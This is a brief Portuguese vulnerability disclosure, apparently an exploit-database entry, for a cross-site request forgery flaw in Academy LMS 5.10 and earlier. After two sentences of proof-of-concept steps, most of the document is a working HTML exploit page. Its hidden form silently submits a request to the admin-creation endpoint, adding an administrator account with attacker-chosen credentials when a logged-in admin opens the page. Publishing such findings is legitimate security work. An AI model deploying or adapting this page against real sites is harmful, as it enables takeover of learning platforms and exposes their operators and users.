
Academy LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
Academy LMS é uma aplicação onde as pessoas podem criar e anunciar cursos. A capacidade de adicionar um novo utilizador administrativo é vulnerável a CSRF, tornando possível o uso de engenharia social para obter acesso de administrador na plataforma.
O primeiro passo na nossa prova de conceito é autenticar-se na plataforma com um utilizador administrativo.
Depois disso, basta aceder à página que contém o código de exploração da vulnerabilidade e verificar que um novo utilizador administrativo foi adicionado ao sistema.
Código usado no exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/academy/admin/admins/add" method="POST">
<input type="hidden" name="first_name" value="csrf" />
<input type="hidden" name="last_name" value="vinix" />
<input type="hidden" name="biography" value="<p>csrf poc</p>" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="user_image" value="" />
<input type="hidden" name="email" value="username" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="facebook_link" value="" />
<input type="hidden" name="twitter_link" value="" />
<input type="hidden" name="linkedin_link" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>